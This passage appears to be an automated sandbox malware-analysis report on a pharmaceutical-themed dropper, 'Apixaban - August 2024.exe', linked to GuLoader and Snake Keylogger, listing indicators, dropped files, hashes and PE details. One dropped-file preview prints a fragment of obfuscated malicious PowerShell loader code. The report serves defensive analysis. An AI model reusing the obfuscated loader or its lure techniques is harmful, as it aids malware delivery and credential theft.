                                              • 188.114.96.3
                                              Confirmation Order.jsGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.97.3
                                              DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              Deye Union - PO # 23081377.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.97.3
                                              rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.97.3
                                              z1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 172.67.177.134
                                              rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              checkip.dyndns.comTorpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 158.101.44.242
                                              Confirmation Order.jsGet hashmaliciousSnake KeyloggerBrowse
                                              • 132.226.247.73
                                              DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 158.101.44.242
                                              Confirmation transfer Note AGS # 22-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 158.101.44.242
                                              Deye Union - PO # 23081377.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 132.226.247.73
                                              rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 158.101.44.242
                                              z1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 158.101.44.242
                                              rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              • 158.101.44.242
                                              rRFQ_025261-97382.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 158.101.44.242
                                              SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              www.reap.skyestates.com.mtConfirmation transfer AGS # 22-00379.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 108.167.181.251
                                              ESPLS-RFQ_2400282.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • 108.167.181.251
                                              MB9901717-PDF.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • 108.167.181.251
                                              Confirmation transfer Note AGS # 22-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 108.167.181.251
                                              List & Sample_Doc3.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 108.167.181.251
                                              Apixaban - August 2024.XLS.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 108.167.181.251
                                              odemePlani.pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • 108.167.181.251
                                              #91139_C050.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • 108.167.181.251
                                              BSX#24001602.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • 108.167.181.251
                                              api.telegram.orgTorpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 149.154.167.220
                                              Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              Lisect_AVT_24003_G1B_33.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Install.msiGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 149.154.167.220
                                              z23RevisedInvoice.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                              • 149.154.167.220
                                              Updated PI.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                              • 149.154.167.220
                                              rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              ORACLE-BMC-31898USTorpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 158.101.44.242
                                              Lisect_AVT_24003_G1B_67.exeGet hashmaliciousUnknownBrowse
                                              • 158.101.28.51
                                              DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 158.101.44.242
                                              Confirmation transfer Note AGS # 22-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 158.101.44.242
                                              counter.exeGet hashmaliciousBdaejecBrowse
                                              • 158.101.87.161
                                              rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 158.101.44.242
                                              z1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 158.101.44.242
                                              rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              • 158.101.44.242
                                              rRFQ_025261-97382.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 158.101.44.242
                                              SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 158.101.44.242
                                              TELEGRAMRUTorpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 149.154.167.220
                                              Bootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
                                              • 149.154.167.99
                                              LisectAVT_2403002C_60.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                              • 149.154.167.99
                                              LisectAVT_2403002C_67.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                              • 149.154.167.99
                                              LisectAVT_2403002C_81.exeGet hashmaliciousVidarBrowse
                                              • 149.154.167.99
                                              Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              CraxsRat VIP.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.99
                                              Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              Lisect_AVT_24003_G1B_33.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              UNIFIEDLAYER-AS-1USConfirmation transfer AGS # 22-00379.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 108.167.181.251
                                              ESPLS-RFQ_2400282.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • 108.167.181.251
                                              MB9901717-PDF.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • 108.167.181.251
                                              LisectAVT_2403002C_14.exeGet hashmaliciousAgentTeslaBrowse
                                              • 162.214.101.129
                                              LisectAVT_2403002C_3.exeGet hashmaliciousFormBookBrowse
                                              • 50.87.186.52
                                              LisectAVT_2403002C_79.dllGet hashmaliciousDridexBrowse
                                              • 50.116.111.64
                                              LisectAVT_2403002C_89.exeGet hashmaliciousFormBookBrowse
                                              • 70.40.218.187
                                              Lisect_AVT_24003_G1B_125.msiGet hashmaliciousUnknownBrowse
                                              • 162.240.8.41
                                              Confirmation transfer Note AGS # 22-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 108.167.181.251
                                              https://mail.tekdecoracoes.com.br/don/upload/en.php?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=&.rand=13InboxLight.aspx?n=1774256418&fid=4Get hashmaliciousUnknownBrowse
                                              • 162.241.63.57

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              54328bd36c14bd82ddaa0c04b25ed9adTorpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 188.114.96.3
                                              Confirmation Order.jsGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              Lisect_AVT_24003_G1B_21.exeGet hashmaliciousUnknownBrowse
                                              • 188.114.96.3
                                              Lisect_AVT_24003_G1B_21.exeGet hashmaliciousUnknownBrowse
                                              • 188.114.96.3
                                              Lisect_AVT_24003_G1B_127.exeGet hashmaliciousPureLog StealerBrowse
                                              • 188.114.96.3
                                              DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              SecuriteInfo.com.W32.Lokibot.N.gen.Eldorado.28246.8151.exeGet hashmaliciousLokibotBrowse
                                              • 188.114.96.3
                                              Deye Union - PO # 23081377.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              3b5074b1b5d032e5620f69f9f700ff0eTorpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 149.154.167.220
                                              LisectAVT_2403002C_15.exeGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
                                              LisectAVT_2403002C_16.exeGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
                                              jRlq1fSUW5.exeGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
                                              Q2XwE8NRLx.exeGet hashmaliciousQuasarBrowse
                                              • 149.154.167.220
                                              Lisect_AVT_24003_G1A_33.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              Lisect_AVT_24003_G1B_84.msiGet hashmaliciousAteraAgentBrowse
                                              • 149.154.167.220
                                              Lisect_AVT_24003_G1B_33.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              Lisect_AVT_24003_G1B_122.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              DD Spotify Acc Gen.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                              • 149.154.167.220
                                              37f463bf4616ecd445d4a1937da06e19ESPLS-RFQ_2400282.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • 108.167.181.251
                                              Confirmation transfer AGS # 22-00379.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 108.167.181.251
                                              ESPLS-RFQ_2400282.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • 108.167.181.251
                                              MB9901717-PDF.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • 108.167.181.251
                                              MGL6070111-PDF.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • 108.167.181.251
                                              Torpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 108.167.181.251
                                              LisectAVT_2403002C_159.exeGet hashmaliciousBdaejec, DarkSideBrowse
                                              • 108.167.181.251
                                              nX1oQE2we8.exeGet hashmaliciousCryptOne, QbotBrowse
                                              • 108.167.181.251
                                              LisectAVT_2403002C_160.exeGet hashmaliciousUpatreBrowse
                                              • 108.167.181.251
                                              Bootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
                                              • 108.167.181.251

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):8003
                                              Entropy (8bit):4.840877972214509
                                              Encrypted:false
                                              SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                              MD5:106D01F562D751E62B702803895E93E0
                                              SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                              SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                              SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ct140sl0.uqu.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k0vbnx0a.o2v.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Kompottens.Sub

                                              Download File
                                              Process:C:\Users\user\Desktop\Apixaban - August 2024.exe
                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                              Category:dropped
                                              Size (bytes):70493
                                              Entropy (8bit):5.227839377157676
                                              Encrypted:false
                                              SSDEEP:1536:KLFSLu8BHGODl6RJBKsSjMXY+BlPjVG9hvps9o8AYm7H:M4uA1SKDFAl5mvpsoDf7H
                                              MD5:E8C10FA43292064CE249E7DA783AB7A5
                                              SHA1:F6718CA6240DEB84559ED748FAC1A7056AF8E28C
                                              SHA-256:491246350A01C2115E9166F01DF3168283131D07CF28BE0936A8F25608DBAB04
                                              SHA-512:2A642C462090EE046440D01A9EE48267D1D51CCA86A7BE407CE8E83153F24785302B3697E62674D7565DC82A9A639830D20AE8CA9EB2527972D62ED16FBD5C62
                                              Malicious:true
                                              Reputation:low
                                              Preview:$Graduationen=$Sikkerhedsforvarede;<#Dramatiserende Sabromin Blokfunktioner Rekognosceringsflyet Trosflle Oplagrer #><#Insufflating Outkill Honnrmarchernes Satiriseringer Optryktes #><#Cinematograph singler philadelphite #><#Bloktilbagekoblingens osteomancy Chiantis Mlkesyre Kartonernes Tegntypes Smaadreng #><#Hjemgaaendes afrivningers Unspasmodical Skrpende Unsceptically Permanence #><#Handelsforbindelses Edikt Besvret Sndagen Echimys Drifternes Interchondral #>$Chamaenerion = "Pastelf;Overins`$Dhole,iEGldb ndnForhngsgForstudhGrsen.eoBalastds Brndemt RecepteArbejdsd C esce= C nogo`$BanepakSAnhyd,ipSolacemes.kstancEnriquei Bourgoa,nprecilOperatib T,waiteNonemulh.cappleaOltun,anS,ndsopdReo.irulAurel.ueAnt.olisTwinkl,;D mmerfFMen,hevuSenderenTiltmakcSteatoptHaringbiRoadeosoDistriknKongepi Bed.evSSlb.vodh Nikolerfordsuti Barf.dn jateorkEnergireSepulchr Samlet Anis.d(Pinnato`$BovbladFSpoofsjoEgenskarCalquinmTastineaInterreaIngen rl,eglozeeHemic.atLrkered,Omstndi Nonpre`$FluorotDEggcra i

                                              C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Switchgirl.Pre

                                              Download File
                                              Process:C:\Users\user\Desktop\Apixaban - August 2024.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):317845
                                              Entropy (8bit):7.665223330622794
                                              Encrypted:false
                                              SSDEEP:6144:8t2hJjHx7SaCi5QzNDA2STBIXH5BpEuB1k88nXEzlHERarE4/spAS2fM:8MhJjHcacXUIpEbXiWRarE4/5S2fM
                                              MD5:04F84B9B85A6D31E825551492196AC2C
                                              SHA1:117B72EFE18901048085CC747AC362E478B30E0B
                                              SHA-256:2CE93893BBA7090AF4F45D93DACC9665FA79E291DD225DAA1E61FE3A4AA8F075
                                              SHA-512:530E0E77DBA1BA95368970B2C06C0AB8A900D1547704BD742FD03BFE292E43D9182D8D6586194BDA53D0209C61E4C08C21F786E15F66D553BDF9A51D10E36CE5
                                              Malicious:false
                                              Reputation:low
                                              Preview:..........................Q.......W..........^^^.2....m..............r.ff..+..E..............(..*.........W...............22222..................ZZ..u........3.z..............D...........................................i.........[..MM...........]..yy..F.ooo............hh....W...MMM.............#.......................................>......................................G...............ttt.........V.VVV........................mmm..............ZZZZZ......pp............dd.........................===.....bb.............................................................................???............7.........................k....U......................@@.d..^^^^........@.......&...............*.....BB....................4444.`.......^^......m............QQ......................66666......+................9..................`.......gg..........9...............................??......................................p........................................00.)...***......jj..........."".....

                                              C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren\Apixaban - August 2024.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Category:dropped
                                              Size (bytes):852456
                                              Entropy (8bit):7.604597113334501
                                              Encrypted:false
                                              SSDEEP:12288:Rt7ExDo//OtX1lxawkeVCGmQzVuoLZJtyG5Hm0WbHYYgh3sZR/pKJt80sNja656y:jYDoeMwkejuoLDt9ZPU/aFsN2vL+
                                              MD5:0E198C53CE387336130BE0C8AD27B7AF
                                              SHA1:AE1762434FBAFE22F064EBA92398F4C118969EFD
                                              SHA-256:53CF1C4A06B8846E9ABF3D97F46FA3CD6C50BDF1FE7C46AA64B65960EB456484
                                              SHA-512:B3D1125852398CE5C3DE8E243EA46805C05F4D0F8CCADA52284C7F5A9A9778A6573A50167E58EB5B5E2EE3AE4C9CB7C165F2050D907B3B3BCE66CF6A6EEF02E0
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 53%
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....f.R.................`...*......X3.......p....@..........................................................................t...........Y...........................................................................p...............................text...f^.......`.................. ..`.rdata..T....p.......d..............@..@.data................x..............@....ndata...................................rsrc....Y.......Z...~..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren\Apixaban - August 2024.exe:Zone.Identifier

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren\ondskabsfuldhedernes.txt

                                              Download File
                                              Process:C:\Users\user\Desktop\Apixaban - August 2024.exe
                                              File Type:ASCII text, with very long lines (367), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):440
                                              Entropy (8bit):4.2802377004664205
                                              Encrypted:false
                                              SSDEEP:12:QEUc9mHApTzMcC94e7q6hDwyK2Xkj9rKZaq:l9JTMp7AyKykBrk
                                              MD5:9524154CFD936F21394F74D000856732
                                              SHA1:3A45FE1B1EAAE9A1CAF11CA59FEBA1B3DE8E0CA3
                                              SHA-256:8EE6AE6BD6F5AF379B359A0CDD7721AEAEE0989C4B61431F2EAB1240FBBA56A2
                                              SHA-512:4DA2F73D1D6F027B9C939785F63D6F75477F978AB7F8532D8395D5C5C346397E1E4B090CC815AA5F75E2629F81C1FD64B7246266331DBB26D3B0075CE4579250
                                              Malicious:false
                                              Preview:habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious deklinationen armiferous bryggerkar totaktsmotorernes ombudsmandsudtalelsers overtinsel metronidazole uldspind..unmortifiedness ildspaasttelserne plagiostomata klauss ryaerne carline,

                                              C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\grensav.sjl

                                              Download File
                                              Process:C:\Users\user\Desktop\Apixaban - August 2024.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):629448
                                              Entropy (8bit):1.257234589035216
                                              Encrypted:false
                                              SSDEEP:1536:LD3CLXCvTm3+3JOgkFWZfcDkZLwWIE4pzswWg95LDsRgtlVkIRh:X3US6uZOgk2fcJl5FWy5LDEQlK0
                                              MD5:B9E5947712FA407B58A8527B52CE050E
                                              SHA1:9FD16F2F3569FF478C591E16A03EF65F7D63E57E
                                              SHA-256:30B60EB19A5E7A32DAB61A17C1BCA485D8040EE9488024AA031C0190A7DCB510
                                              SHA-512:BBCF1AC518547982928276E01EA61C26600A426EBD57928A82801F5ACBD8E2047359AC1CB41DEB0898CFB5D10BAA419C782C910830517C3F44F555963D6EEB9D
                                              Malicious:false
                                              Preview:....,......................................................................k............\..................................J.................................................}.......................R....................... ........k...........$.....................................................'............ ...............................I....................2................=.................................................................................................................d.................................................................g..............................................X.....................j............................................................................4....mJ..T...Z......................... ..................Y......Z.......................................U.............L....u..S......................................................U.................................U..................................................e.........................

                                              C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\lokalplanrammes.sus

                                              Download File
                                              Process:C:\Users\user\Desktop\Apixaban - August 2024.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):221081
                                              Entropy (8bit):1.2406328235167285
                                              Encrypted:false
                                              SSDEEP:768:+sNmrp+QYzgwtqzOh8mcMPPy14oMvFzm8w/Y8vnLXWY8UBiBXVO3FzxrFUHItn4x:Y9A/S50ytu8voKwH
                                              MD5:D0A61E12A7A27A4B719AB0C4B9F57B88
                                              SHA1:55A349C760BA7AF05C54934924E2C0289BB3FF24
                                              SHA-256:243221C7BE40D55E82FDF162332959F85DF94CAF3EC8BC550EEE0DE0FC814A64
                                              SHA-512:3F117A4C26DDC7200AF9A79E8965F4396D175B368FF372BC7210929B15BA43B56EF68C6870F914638EC49ADF18CB553DF4492F583485ECC954C0238CC1405670
                                              Malicious:false
                                              Preview:.....................I...............................................\..................................Y.............................^...............................................................=..........e........................C....P................................`...............-.........................'.........................................................M.........................D....................[@..........................................H..........A...........................................d.........Lk.........................H.......n..............................................................................................C.........................4...v........................JU........&..................................................................]..... ....................................N..............................'.............................^.........................................................................k...............*...............

                                              C:\Users\user\AppData\Local\Temp\nszF66C.tmp

                                              Download File
                                              Process:C:\Users\user\Desktop\Apixaban - August 2024.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1248907
                                              Entropy (8bit):3.7915159042372246
                                              Encrypted:false
                                              SSDEEP:12288:aMhJjHcacXUIpEbXiWRarE4/5S2f44h3tDQ5Cact5v:ZhRHRCUIpEbXi3ZAK3tM4v
                                              MD5:ABEBD1F184166922C6AB5A41AD6F1DCA
                                              SHA1:BD7FB36D783C4D301AB097D4B6EE574BA7CF1264
                                              SHA-256:6F22D53F2F6F237B6AD102ADC3D857548C1C2F14E60878AFE0825C65CB0DEAA5
                                              SHA-512:42C4EBACF429F074279F9F78B4E939E36ED16C7BBF64A1F4CD5712116DCF829B1AED6EC46893A85F758E66C0F44D9C37D2531E897326B49A352DFD40FBB09C4E
                                              Malicious:false
                                              Preview:h%......,...................U............$......h%........................................................................................................................................................................................................................................G...f...............j...............................................................................................................................v...............4.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):7.604597113334501
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:Apixaban - August 2024.exe
                                              File size:852'456 bytes
                                              MD5:0e198c53ce387336130be0c8ad27b7af
                                              SHA1:ae1762434fbafe22f064eba92398f4c118969efd
                                              SHA256:53cf1c4a06b8846e9abf3d97f46fa3cd6c50bdf1fe7c46aa64b65960eb456484
                                              SHA512:b3d1125852398ce5c3de8e243ea46805c05f4d0f8ccada52284c7f5a9a9778a6573a50167e58eb5b5e2ee3ae4c9cb7c165f2050d907b3b3bce66cf6a6eef02e0
                                              SSDEEP:12288:Rt7ExDo//OtX1lxawkeVCGmQzVuoLZJtyG5Hm0WbHYYgh3sZR/pKJt80sNja656y:jYDoeMwkejuoLDt9ZPU/aFsN2vL+
                                              TLSH:8B05125573A2E980DC450D74415BCB818EB2CD242A52EA8737A8B7AFDF336C17B06357
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....f.R.................`...*......X3.......p....@

                                              File Icon

                                              Icon Hash:293cc0c898b02800

                                              Static PE Info

                                              General

                                              Entrypoint:0x403358
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                              Time Stamp:0x52BA66B2 [Wed Dec 25 05:01:38 2013 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:e221f4f7d36469d53810a4b5f9fc8966

                                              Authenticode Signature

                                              Signature Valid:false
                                              Signature Issuer:CN="Stereographical Aplacophoran ", O=Skilderhusene, L=Villemomble, S=\xcele-de-France, C=FR
                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                              Error Number:-2146762487
                                              Not Before, Not After
                                              • 10/07/2024 10:49:44 10/07/2027 10:49:44
                                              Subject Chain
                                              • CN="Stereographical Aplacophoran ", O=Skilderhusene, L=Villemomble, S=\xcele-de-France, C=FR
                                              Version:3
                                              Thumbprint MD5:09E48A2D24D434C9B03763AC3842AFFC
                                              Thumbprint SHA-1:06E381E065DC1EC0458B3C8F9505E61DC6935161
                                              Thumbprint SHA-256:0A0729A9A709CCBF7AE5518697B00097BD70E82361F4E78166082D9FE9908715
                                              Serial:5C0C40BDC78747BF5F1DC7917DCFEEF1C9C94E14

                                              Entrypoint Preview

                                              Instruction
                                              sub esp, 000002D4h
                                              push ebx
                                              push ebp
                                              push esi
                                              push edi
                                              push 00000020h
                                              xor ebp, ebp
                                              pop esi
                                              mov dword ptr [esp+14h], ebp
